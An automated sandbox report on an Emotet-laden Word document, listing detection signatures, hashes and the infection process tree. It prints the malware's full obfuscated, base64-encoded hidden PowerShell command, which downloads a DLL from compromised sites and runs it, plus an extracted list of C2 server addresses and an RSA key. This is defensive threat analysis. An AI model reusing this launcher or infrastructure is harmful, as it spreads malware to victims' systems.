Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report ARCH_25_012021.doc

Overview

General Information

Sample Name:ARCH_25_012021.doc
Analysis ID:344852
MD5:baedc37e68b58765fa52c73d0fd2c2d5
SHA1:2131d1319b5de532638d34f1e3bf68337b6099bf
SHA256:94485b3ce47d4a2df6dba8e888ca7a360763f7edd5a0448552d1d06b6e4f4baa

Most interesting Screenshot:

Detection

Emotet
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected Emotet
C2 URLs / IPs found in malware configuration
Creates processes via WMI
Document contains an embedded VBA with many GOTO operations indicating source code obfuscation
Encrypted powershell cmdline option found
Hides that the sample has been downloaded from the Internet (zone.identifier)
Machine Learning detection for dropped file
Obfuscated command line found
Potential dropper URLs found in powershell memory
Powershell drops PE file
Sigma detected: Suspicious Call by Ordinal
Sigma detected: Suspicious Encoded PowerShell Command Line
Suspicious powershell command line found
Very long command line found
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Startup

  • System is w7x64
  • WINWORD.EXE (PID: 2408 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 95C38D04597050285A18F66039EDB456)
  • cmd.exe (PID: 2516 cmdline: cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc UwBFAFQAIAAgACgAIgA1ACIAKwAiAEYAVABzAEcAIgApACAAKAAgAFsAdABZAFAARQBdACgAIgB7ADEAfQB7ADMAfQB7ADAAfQB7ADQAfQB7ADIAfQAiACAALQBGACAAJwBJAG8ALgAnACwAJwBzAHkAJwAsACcATwByAHkAJwAsACcAcwB0AGUAbQAuACcALAAnAGQASQByAGUAYwB0ACcAKQApACAAOwAgACAAJABxAEUAMwBSADkAPQAgACAAWwBUAHkAUABlAF0AKAAiAHsAMQB9AHsAMAB9AHsANQB9AHsANAB9AHsAMgB9AHsAMwB9ACIALQBmACcAWQAnACwAJwBTACcALAAnAFAAbwBpAE4AdABtAEEAbgAnACwAJwBBAEcARQByACcALAAnAHQARQBtAC4AbgBFAFQALgBTAGUAUgBWAEkAYwBlACcALAAnAHMAJwApACAAIAA7ACQASwBvADMAYQBjADYAMwA9ACQAVAA4ADIASAAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQAUAA2AF8AUwA7ACQASQA3ADAAWgA9ACgAJwBZADUAJwArACcAMABFACcAKQA7ACAAIAAoAEcAZQB0AC0AaQBUAEUAbQAgACAAKAAiAHYAIgArACIAYQAiACsAIgBSAEkAQQBCAGwAZQA6ADUAIgArACIARgB0AFMAZwAiACkAIAAgACkALgBWAGEAbABVAGUAOgA6ACIAQwByAGAARQBBAHQARQBgAGQAaQByAGUAYABjAHQAbwByAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAGUAMgBXACcAKwAnAEsAJwArACcAYQBrACcAKQArACgAJwB0AGsAcwB3ACcAKwAnAGUAJwArACcAMgBXACcAKQArACgAJwBBAG4ANgBvAHQAJwArACcAaAAnACkAKwAoACcAaABlACcAKwAnADIAVwAnACkAKQAgACAALQBjAFIARQBQAEwAQQBDAGUAIAAoACcAZQAnACsAJwAyAFcAJwApACwAWwBDAEgAQQBSAF0AOQAyACkAKQA7ACQAVwA5ADAAWAA9ACgAJwBEACcAKwAoACcANgAzACcAKwAnAFQAJwApACkAOwAgACgAVgBhAHIASQBBAEIAbABlACAAUQBlADMAUgA5ACAALQB2AEEATAB1AEUATwBuAGwAIAAgACkAOgA6ACIAUwBgAEUAQwBgAFUAcgBJAHQAYABZAGAAcAByAG8AdABvAEMATwBMACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABFADMAMgBOAD0AKAAnAEoAJwArACgAJwA5ADYAJwArACcAQwAnACkAKQA7ACQAVQBlADcAdgA2AGUAbQAgAD0AIAAoACgAJwBOACcAKwAnADQAOQAnACkAKwAnAEkAJwApADsAJABCADMAMQBDAD0AKAAnAEEAOAAnACsAJwAxAEoAJwApADsAJABRAGYAeAAxADAAeABhAD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0ASwBhACcAKwAnAGsAdABrAHMAdwB7ACcAKwAnADAAJwArACcAfQAnACsAJwBBAG4AJwArACcANgBvAHQAaABoAHsAMAB9ACcAKQAtAEYAIABbAGMAaABhAFIAXQA5ADIAKQArACQAVQBlADcAdgA2AGUAbQArACcALgBkACcAIAArACAAJwBsAGwAJwA7ACQAWQAwADMARQA9ACgAJwBCADMAJwArACcAMwBSACcAKQA7ACQASwAxAGkAdQB4AHgAcAA9ACcAaAAnACAAKwAgACcAdAB0ACcAIAArACAAJwBwACcAOwAkAFQAYQAxAHkAcwBwADQAPQAoACcAbgBzACcAKwAnACAAJwArACgAJwB3AHUAIABkACcAKwAnAGIAIAAnACkAKwAoACcAbgAnACsAJwBkADoAJwApACsAKAAnAC8AJwArACcALwBzAGgAYQBuACcAKQArACcAbgAnACsAKAAnAGEAcgAnACsAJwBlACcAKQArACcAZAAnACsAKAAnAC4AYwBvAG0ALwBjAG8AJwArACcAbgAnACsAJwB0AGUAJwArACcAbgAnACkAKwAnAHQAJwArACgAJwAvAGwAaAAnACsAJwBBACcAKQArACgAJwBMAGUAJwArACcAUwAnACkAKwAoACcALwAhAG4AJwArACcAcwAnACkAKwAoACcAIAB3AHUAIAAnACsAJwBkAGIAJwApACsAKAAnACAAbgAnACsAJwBkADoAJwApACsAJwAvAC8AJwArACgAJwBqAGUAZQAnACsAJwB2AGEAbgAnACkAKwAoACcAbABpAGMALgBjAG8AbQAvAHcAJwArACcAcAAtACcAKwAnAGMAbwAnACsAJwBuACcAKwAnAHQAZQAnACkAKwAoACcAbgB0ACcAKwAnAC8AJwApACsAKAAnAHIAJwArACcAOABNAC8AIQAnACsAJwBuAHMAJwApACsAKAAnACAAJwArACcAdwB1ACAAJwArACcAZABiACAAbgBkACcAKQArACgAJwA6AC8AJwArACcALwBkACcAKQArACcAYQBzACcAKwAoACcAaAAnACsAJwB1AGQAJwApACsAKAAnAGEAbgBjAGUAJwArACcALgBjAG8AJwApACsAKAAnAG0ALwAnACsAJwB0AGgAJwApACsAJwBpAG4AJwArACgAJwBrAHAAJwArACcAaAAnACsAJwBwAC8AZAAnACkAKwAnAGcAJwArACcAcwAnACsAKAAnADcASgAnACsAJwBtADkAJwApACsAJwAvACcAKwAoACcAIQBuACcAKwAnAHMAIAB3ACcAKQArACgAJwB1ACAAZAAnACsAJwBiACcAKQArACgAJwAgAG4AJwArACcAZAA6AC8AJwArACcALwAnACkAKwAoACcAbAAnACsAJwBlAG8AJwApACsAKAAnAHAAYQByACcAKwAnAGQAYwAnACkAKwAoACcAcgBhAG4AJwArACcAZQBzACcAKQArACgAJwAuAGMAbwAnACsAJwBtAC8AJwArACcAegB5AG4AcQAnACkAKwAnAC0AJwArACcAbAAnACsAKAAnAGkAJwArACcAbgB1ACcAKwAnAHgAJwArACcALQB5AGEAYQB5ACcAKQArACcAZgAvACcAKwAoACcAdwAnACsAJwAvACEAbgAnACkAKwAnAHMAIAAnACsAKAAnAHcAdQAgACcAKwAnAGQAYgAnACsAJwAgACcAKQArACcAbgAnACsAJwBkACcAKwAnADoAJwArACcALwAnACsAKAAnAC8AbQBtAHIAaQBuAGMAJwArACcAcwAuACcAKQArACgAJwBjAG8AJwArACcAbQAnACsAJwAvAGUAdABlAHIAbgBhAGwALQAnACkAKwAoACcAZAAnACsAJwB1AGUAbAAnACkAKwAoACcAaQAnACsAJwBzAHQALQAnACkAKwAoACcAOQBjAHUAJwArACcAcQB2AC8AagAnACkAKwAoACcAeAAnACsAJwBHAFEAagAvACEAJwArACcAbgAnACkAKwAoACcAcwAnACsAJwAgAHcAJwApACsAKAAnAHUAIABkACcAKwAnAGIAIABuAGQAJwArACcAOgAvACcAKQArACgAJwAvADMAJwArACcAbQB1ACcAKwAnAHMAawAnACkAKwAnAGUAdAAnACsAKAAnAGUAZQByACcAKwAnAHMAZQBuAHQALgBuAGUAJwArACcAdAAvACcAKQArACgAJwB3ACcAKwAnAHAALQBpAG4AJwArACcAYwBsAHUAZABlAHMALwBUAFUAJwArACcAZwBEAC8AIQBuACcAKwAnAHMAIAAnACkAKwAnAHcAdQAnACsAJwAgACcAKwAoACcAZAAnACsAJwBiACAAJwApACsAKAAnAG4AZAAnACsAJwBzACcAKQArACgAJwA6ACcAKwAnAC8ALwAnACkAKwAoACcAcwAnACsAJwBrAGkAbABtAHUAJwArACcALgBjAG8AJwApACsAKAAnAG0ALwAnACsAJwB3ACcAKwAnAHAALQBhACcAKQArACcAZAAnACsAKAAnAG0AaQBuAC8AJwArACcAaAAnACsAJwBRACcAKQArACgAJwBWAGwAQgAnACsAJwA4AGIALwAnACkAKQAuACIAcgBgAGUAUABsAEEAYABjAEUAIgAoACgAKAAnAG4AcwAnACsAJwAgACcAKQArACgAJwB3AHUAIABkACcAKwAnAGIAIAAnACkAKwAnAG4AZAAnACkALAAoAFsAYQByAHIAYQB5AF0AKAAnAG4AagAnACwAJwB0AHIAJwApACwAJwB5AGoAJwAsACcAcwBjACcALAAkAEsAMQBpAHUAeAB4AHAALAAnAHcAZAAnACkAWwAzAF0AKQAuACIAUwBwAGAAbABpAFQAIgAoACQARAA1ADQAUwAgACsAIAAkAEsAbwAzAGEAYwA2ADMAIAArACAAJABGADAAOABKACkAOwAkAE8AMQA2AFIAPQAoACcAWAA2ACcAKwAnADIAVgAnACkAOwBmAG8AcgBlAGEAYwBoACAAKAAkAEoAZAA1AHMAXwBoAGYAIABpAG4AIAAkAFQAYQAxAHkAcwBwADQAKQB7AHQAcgB5AHsAKAAmACgAJwBOAGUAJwArACcAdwAtAE8AJwArACcAYgBqACcAKwAnAGUAYwB0ACcAKQAgAHMAeQBTAFQARQBNAC4ATgBlAFQALgB3AEUAQgBDAEwASQBFAG4AdAApAC4AIgBEAE8AdwBOAGAATABgAG8AQQBgAEQARgBJAGwARQAiACgAJABKAGQANQBzAF8AaABmACwAIAAkAFEAZgB4ADEAMAB4AGEAKQA7ACQATAAyADkARAA9ACgAJwBPADYAJwArACcANABIACcAKQA7AEkAZgAgACgAKAAmACgAJwBHAGUAdAAtAEkAJwArACcAdABlACcAKwAnAG0AJwApACAAJABRAGYAeAAxADAAeABhACkALgAiAEwAYABlAG4ARwBgAFQAaAAiACAALQBnAGUAIAA0ADQANwAxADIAKQAgAHsAJgAoACcAcgB1AG4AZAAnACsAJwBsAGwAMwAyACcAKQAgACQAUQBmAHgAMQAwAHgAYQAsACgAJwBBACcAKwAoACcAbgB5AFMAdAAnACsAJwByACcAKQArACgAJwBpACcAKwAnAG4AZwAnACkAKQAuACIAVABvAHMAYABUAFIAaQBgAE4AZwAiACgAKQA7ACQAQgAyADcAQgA9ACgAKAAnAFcANAAnACsAJwAzACcAKQArACcAUwAnACkAOwBiAHIAZQBhAGsAOwAkAFoAOAAxAFYAPQAoACcASQA2ACcAKwAnADIAWQAnACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEIANQA4AEkAPQAoACcATwAzACcAKwAnADUASQAnACkA MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
    • msg.exe (PID: 2296 cmdline: msg user /v Word experienced an error trying to open the file. MD5: 2214979661E779C3E3C33D4F14E6F3AC)
    • powershell.exe (PID: 1552 cmdline: powershell -w hidden -enc UwBFAFQAIAAgACgAIgA1ACIAKwAiAEYAVABzAEcAIgApACAAKAAgAFsAdABZAFAARQBdACgAIgB7ADEAfQB7ADMAfQB7ADAAfQB7ADQAfQB7ADIAfQAiACAALQBGACAAJwBJAG8ALgAnACwAJwBzAHkAJwAsACcATwByAHkAJwAsACcAcwB0AGUAbQAuACcALAAnAGQASQByAGUAYwB0ACcAKQApACAAOwAgACAAJABxAEUAMwBSADkAPQAgACAAWwBUAHkAUABlAF0AKAAiAHsAMQB9AHsAMAB9AHsANQB9AHsANAB9AHsAMgB9AHsAMwB9ACIALQBmACcAWQAnACwAJwBTACcALAAnAFAAbwBpAE4AdABtAEEAbgAnACwAJwBBAEcARQByACcALAAnAHQARQBtAC4AbgBFAFQALgBTAGUAUgBWAEkAYwBlACcALAAnAHMAJwApACAAIAA7ACQASwBvADMAYQBjADYAMwA9ACQAVAA4ADIASAAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQAUAA2AF8AUwA7ACQASQA3ADAAWgA9ACgAJwBZADUAJwArACcAMABFACcAKQA7ACAAIAAoAEcAZQB0AC0AaQBUAEUAbQAgACAAKAAiAHYAIgArACIAYQAiACsAIgBSAEkAQQBCAGwAZQA6ADUAIgArACIARgB0AFMAZwAiACkAIAAgACkALgBWAGEAbABVAGUAOgA6ACIAQwByAGAARQBBAHQARQBgAGQAaQByAGUAYABjAHQAbwByAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAGUAMgBXACcAKwAnAEsAJwArACcAYQBrACcAKQArACgAJwB0AGsAcwB3ACcAKwAnAGUAJwArACcAMgBXACcAKQArACgAJwBBAG4ANgBvAHQAJwArACcAaAAnACkAKwAoACcAaABlACcAKwAnADIAVwAnACkAKQAgACAALQBjAFIARQBQAEwAQQBDAGUAIAAoACcAZQAnACsAJwAyAFcAJwApACwAWwBDAEgAQQBSAF0AOQAyACkAKQA7ACQAVwA5ADAAWAA9ACgAJwBEACcAKwAoACcANgAzACcAKwAnAFQAJwApACkAOwAgACgAVgBhAHIASQBBAEIAbABlACAAUQBlADMAUgA5ACAALQB2AEEATAB1AEUATwBuAGwAIAAgACkAOgA6ACIAUwBgAEUAQwBgAFUAcgBJAHQAYABZAGAAcAByAG8AdABvAEMATwBMACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABFADMAMgBOAD0AKAAnAEoAJwArACgAJwA5ADYAJwArACcAQwAnACkAKQA7ACQAVQBlADcAdgA2AGUAbQAgAD0AIAAoACgAJwBOACcAKwAnADQAOQAnACkAKwAnAEkAJwApADsAJABCADMAMQBDAD0AKAAnAEEAOAAnACsAJwAxAEoAJwApADsAJABRAGYAeAAxADAAeABhAD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0ASwBhACcAKwAnAGsAdABrAHMAdwB7ACcAKwAnADAAJwArACcAfQAnACsAJwBBAG4AJwArACcANgBvAHQAaABoAHsAMAB9ACcAKQAtAEYAIABbAGMAaABhAFIAXQA5ADIAKQArACQAVQBlADcAdgA2AGUAbQArACcALgBkACcAIAArACAAJwBsAGwAJwA7ACQAWQAwADMARQA9ACgAJwBCADMAJwArACcAMwBSACcAKQA7ACQASwAxAGkAdQB4AHgAcAA9ACcAaAAnACAAKwAgACcAdAB0ACcAIAArACAAJwBwACcAOwAkAFQAYQAxAHkAcwBwADQAPQAoACcAbgBzACcAKwAnACAAJwArACgAJwB3AHUAIABkACcAKwAnAGIAIAAnACkAKwAoACcAbgAnACsAJwBkADoAJwApACsAKAAnAC8AJwArACcALwBzAGgAYQBuACcAKQArACcAbgAnACsAKAAnAGEAcgAnACsAJwBlACcAKQArACcAZAAnACsAKAAnAC4AYwBvAG0ALwBjAG8AJwArACcAbgAnACsAJwB0AGUAJwArACcAbgAnACkAKwAnAHQAJwArACgAJwAvAGwAaAAnACsAJwBBACcAKQArACgAJwBMAGUAJwArACcAUwAnACkAKwAoACcALwAhAG4AJwArACcAcwAnACkAKwAoACcAIAB3AHUAIAAnACsAJwBkAGIAJwApACsAKAAnACAAbgAnACsAJwBkADoAJwApACsAJwAvAC8AJwArACgAJwBqAGUAZQAnACsAJwB2AGEAbgAnACkAKwAoACcAbABpAGMALgBjAG8AbQAvAHcAJwArACcAcAAtACcAKwAnAGMAbwAnACsAJwBuACcAKwAnAHQAZQAnACkAKwAoACcAbgB0ACcAKwAnAC8AJwApACsAKAAnAHIAJwArACcAOABNAC8AIQAnACsAJwBuAHMAJwApACsAKAAnACAAJwArACcAdwB1ACAAJwArACcAZABiACAAbgBkACcAKQArACgAJwA6AC8AJwArACcALwBkACcAKQArACcAYQBzACcAKwAoACcAaAAnACsAJwB1AGQAJwApACsAKAAnAGEAbgBjAGUAJwArACcALgBjAG8AJwApACsAKAAnAG0ALwAnACsAJwB0AGgAJwApACsAJwBpAG4AJwArACgAJwBrAHAAJwArACcAaAAnACsAJwBwAC8AZAAnACkAKwAnAGcAJwArACcAcwAnACsAKAAnADcASgAnACsAJwBtADkAJwApACsAJwAvACcAKwAoACcAIQBuACcAKwAnAHMAIAB3ACcAKQArACgAJwB1ACAAZAAnACsAJwBiACcAKQArACgAJwAgAG4AJwArACcAZAA6AC8AJwArACcALwAnACkAKwAoACcAbAAnACsAJwBlAG8AJwApACsAKAAnAHAAYQByACcAKwAnAGQAYwAnACkAKwAoACcAcgBhAG4AJwArACcAZQBzACcAKQArACgAJwAuAGMAbwAnACsAJwBtAC8AJwArACcAegB5AG4AcQAnACkAKwAnAC0AJwArACcAbAAnACsAKAAnAGkAJwArACcAbgB1ACcAKwAnAHgAJwArACcALQB5AGEAYQB5ACcAKQArACcAZgAvACcAKwAoACcAdwAnACsAJwAvACEAbgAnACkAKwAnAHMAIAAnACsAKAAnAHcAdQAgACcAKwAnAGQAYgAnACsAJwAgACcAKQArACcAbgAnACsAJwBkACcAKwAnADoAJwArACcALwAnACsAKAAnAC8AbQBtAHIAaQBuAGMAJwArACcAcwAuACcAKQArACgAJwBjAG8AJwArACcAbQAnACsAJwAvAGUAdABlAHIAbgBhAGwALQAnACkAKwAoACcAZAAnACsAJwB1AGUAbAAnACkAKwAoACcAaQAnACsAJwBzAHQALQAnACkAKwAoACcAOQBjAHUAJwArACcAcQB2AC8AagAnACkAKwAoACcAeAAnACsAJwBHAFEAagAvACEAJwArACcAbgAnACkAKwAoACcAcwAnACsAJwAgAHcAJwApACsAKAAnAHUAIABkACcAKwAnAGIAIABuAGQAJwArACcAOgAvACcAKQArACgAJwAvADMAJwArACcAbQB1ACcAKwAnAHMAawAnACkAKwAnAGUAdAAnACsAKAAnAGUAZQByACcAKwAnAHMAZQBuAHQALgBuAGUAJwArACcAdAAvACcAKQArACgAJwB3ACcAKwAnAHAALQBpAG4AJwArACcAYwBsAHUAZABlAHMALwBUAFUAJwArACcAZwBEAC8AIQBuACcAKwAnAHMAIAAnACkAKwAnAHcAdQAnACsAJwAgACcAKwAoACcAZAAnACsAJwBiACAAJwApACsAKAAnAG4AZAAnACsAJwBzACcAKQArACgAJwA6ACcAKwAnAC8ALwAnACkAKwAoACcAcwAnACsAJwBrAGkAbABtAHUAJwArACcALgBjAG8AJwApACsAKAAnAG0ALwAnACsAJwB3ACcAKwAnAHAALQBhACcAKQArACcAZAAnACsAKAAnAG0AaQBuAC8AJwArACcAaAAnACsAJwBRACcAKQArACgAJwBWAGwAQgAnACsAJwA4AGIALwAnACkAKQAuACIAcgBgAGUAUABsAEEAYABjAEUAIgAoACgAKAAnAG4AcwAnACsAJwAgACcAKQArACgAJwB3AHUAIABkACcAKwAnAGIAIAAnACkAKwAnAG4AZAAnACkALAAoAFsAYQByAHIAYQB5AF0AKAAnAG4AagAnACwAJwB0AHIAJwApACwAJwB5AGoAJwAsACcAcwBjACcALAAkAEsAMQBpAHUAeAB4AHAALAAnAHcAZAAnACkAWwAzAF0AKQAuACIAUwBwAGAAbABpAFQAIgAoACQARAA1ADQAUwAgACsAIAAkAEsAbwAzAGEAYwA2ADMAIAArACAAJABGADAAOABKACkAOwAkAE8AMQA2AFIAPQAoACcAWAA2ACcAKwAnADIAVgAnACkAOwBmAG8AcgBlAGEAYwBoACAAKAAkAEoAZAA1AHMAXwBoAGYAIABpAG4AIAAkAFQAYQAxAHkAcwBwADQAKQB7AHQAcgB5AHsAKAAmACgAJwBOAGUAJwArACcAdwAtAE8AJwArACcAYgBqACcAKwAnAGUAYwB0ACcAKQAgAHMAeQBTAFQARQBNAC4ATgBlAFQALgB3AEUAQgBDAEwASQBFAG4AdAApAC4AIgBEAE8AdwBOAGAATABgAG8AQQBgAEQARgBJAGwARQAiACgAJABKAGQANQBzAF8AaABmACwAIAAkAFEAZgB4ADEAMAB4AGEAKQA7ACQATAAyADkARAA9ACgAJwBPADYAJwArACcANABIACcAKQA7AEkAZgAgACgAKAAmACgAJwBHAGUAdAAtAEkAJwArACcAdABlACcAKwAnAG0AJwApACAAJABRAGYAeAAxADAAeABhACkALgAiAEwAYABlAG4ARwBgAFQAaAAiACAALQBnAGUAIAA0ADQANwAxADIAKQAgAHsAJgAoACcAcgB1AG4AZAAnACsAJwBsAGwAMwAyACcAKQAgACQAUQBmAHgAMQAwAHgAYQAsACgAJwBBACcAKwAoACcAbgB5AFMAdAAnACsAJwByACcAKQArACgAJwBpACcAKwAnAG4AZwAnACkAKQAuACIAVABvAHMAYABUAFIAaQBgAE4AZwAiACgAKQA7ACQAQgAyADcAQgA9ACgAKAAnAFcANAAnACsAJwAzACcAKQArACcAUwAnACkAOwBiAHIAZQBhAGsAOwAkAFoAOAAxAFYAPQAoACcASQA2ACcAKwAnADIAWQAnACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEIANQA4AEkAPQAoACcATwAzACcAKwAnADUASQAnACkA MD5: 852D67A27E454BD389FA7F02A8CBE23F)
      • rundll32.exe (PID: 2304 cmdline: 'C:\Windows\system32\rundll32.exe' C:\Users\user\Kaktksw\An6othh\N49I.dll AnyString MD5: DD81D91FF3B0763C392422865C9AC12E)
        • rundll32.exe (PID: 2748 cmdline: 'C:\Windows\system32\rundll32.exe' C:\Users\user\Kaktksw\An6othh\N49I.dll AnyString MD5: 51138BEEA3E2C21EC44D0932C71762A8)
          • rundll32.exe (PID: 2728 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Kaktksw\An6othh\N49I.dll',#1 MD5: 51138BEEA3E2C21EC44D0932C71762A8)
            • rundll32.exe (PID: 2812 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Xsugi\zrfn.shd',FIxqgRZUp MD5: 51138BEEA3E2C21EC44D0932C71762A8)
              • rundll32.exe (PID: 2876 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Xsugi\zrfn.shd',#1 MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                • rundll32.exe (PID: 2908 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Omuzql\aridm.cve',PiBVmMpskdW MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                  • rundll32.exe (PID: 912 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Omuzql\aridm.cve',#1 MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                    • rundll32.exe (PID: 1616 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Yjyrclfl\qwodoyj.whn',CPVO MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                      • rundll32.exe (PID: 2492 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Yjyrclfl\qwodoyj.whn',#1 MD5: 51138BEEA3E2C21EC44D0932C71762A8)
  • cleanup

Malware Configuration

Threatname: Emotet

{"C2 list": ["84.232.229.24:80", "51.255.203.164:8080", "217.160.169.110:8080", "185.183.16.47:80", "190.45.24.210:80", "187.162.248.237:80", "93.146.143.191:80", "185.94.252.27:443", "143.0.85.206:7080", "80.15.100.37:80", "85.105.239.184:443", "94.176.234.118:443", "62.84.75.50:80", "137.74.106.111:7080", "172.104.169.32:8080", "46.105.114.137:8080", "94.126.8.1:80", "78.206.229.130:80", "93.149.120.214:80", "192.175.111.212:7080", "80.249.176.206:80", "181.10.46.92:80", "190.24.243.186:80", "191.223.36.170:80", "177.23.7.151:80", "154.127.113.242:80", "51.255.165.160:8080", "87.106.46.107:8080", "85.214.26.7:8080", "190.247.139.101:80", "46.101.58.37:8080", "201.185.69.28:443", "46.43.2.95:8080", "82.208.146.142:7080", "110.39.160.38:443", "186.177.174.163:80", "51.38.124.206:80", "81.4.105.175:8080", "209.33.120.130:80", "172.245.248.239:8080", "45.16.226.117:443", "104.130.154.83:7080", "217.13.106.14:8080", "94.23.45.86:7080", "152.169.22.67:80", "12.162.84.2:8080", "201.48.121.65:443", "81.17.93.134:80", "81.215.230.173:443", "60.93.23.51:80", "122.201.23.45:443", "31.27.59.105:80", "105.209.235.113:8080", "197.232.36.108:80", "91.233.197.70:80", "87.106.253.248:8080", "138.97.60.141:7080", "152.170.79.100:80", "190.251.216.100:80", "177.85.167.10:80", "212.71.237.140:8080", "82.48.39.246:80", "213.52.74.198:80", "116.125.120.88:443", "81.214.253.80:443", "149.62.173.247:8080", "152.231.89.226:80", "206.189.232.2:8080", "181.30.61.163:443", "1.226.84.243:8080", "191.241.233.198:80", "109.101.137.162:8080", "110.39.162.2:443", "167.71.148.58:443", "5.196.35.138:7080", "190.64.88.186:443", "200.75.39.254:80", "138.97.60.140:8080", "170.81.48.2:80", "70.32.115.157:8080", "104.131.41.185:8080", "190.162.232.138:80", "188.135.15.49:80", "95.76.153.115:80", "188.225.32.231:7080", "12.163.208.58:80", "50.28.51.143:8080", "202.134.4.210:7080", "190.210.246.253:80", "149.202.72.142:7080", "138.197.99.250:8080", "68.183.190.199:8080", "211.215.18.93:8080"], "RSA Public Key": "MHwwDQYJKoZIhvcNAQEBBQADawAwaAJhAOZ9fLJ8UrI0OZURpPsR3eijAyfPj3z6\nuS75f2igmYFW2aWgNcFIzsAYQleKzD0nlCFHOo7Zf8/4wY2UW0CJ4dJEHnE/PHlz\n6uNk3pxjm7o4eCDyiJbzf+k0Azjl0q54FQIDAQAB"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000E.00000002.2340258197.0000000000740000.00000040.00020000.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
    0000000E.00000002.2340368896.00000000007E0000.00000040.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
      0000000D.00000002.2114550082.00000000007B0000.00000040.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
        00000008.00000002.2102026803.00000000002D0000.00000040.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
          0000000D.00000002.2114093455.0000000000710000.00000040.00020000.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
            Click to see the 19 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            9.2.rundll32.exe.210000.0.raw.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
              14.2.rundll32.exe.740000.1.raw.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
                12.2.rundll32.exe.1b0000.0.raw.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
                  11.2.rundll32.exe.750000.1.raw.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
                    11.2.rundll32.exe.2a0000.0.raw.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
                      Click to see the 27 entries

                      Sigma Overview

                      System Summary:

                      barindex
                      Sigma detected: Suspicious Call by OrdinalShow sources
                      Source: Process startedAuthor: Florian Roth: Data: Command: C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Kaktksw\An6othh\N49I.dll',#1, CommandLine: C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Kaktksw\An6othh\N49I.dll',#1, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: 'C:\Windows\system32\rundll32.exe' C:\Users\user\Kaktksw\An6othh\N49I.dll AnyString, ParentImage: C:\Windows\SysWOW64\rundll32.exe, ParentProcessId: 2748, ProcessCommandLine: C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Kaktksw\An6othh\N49I.dll',#1, ProcessId: 2728
                      Sigma detected: Suspicious Encoded PowerShell Command LineShow sources
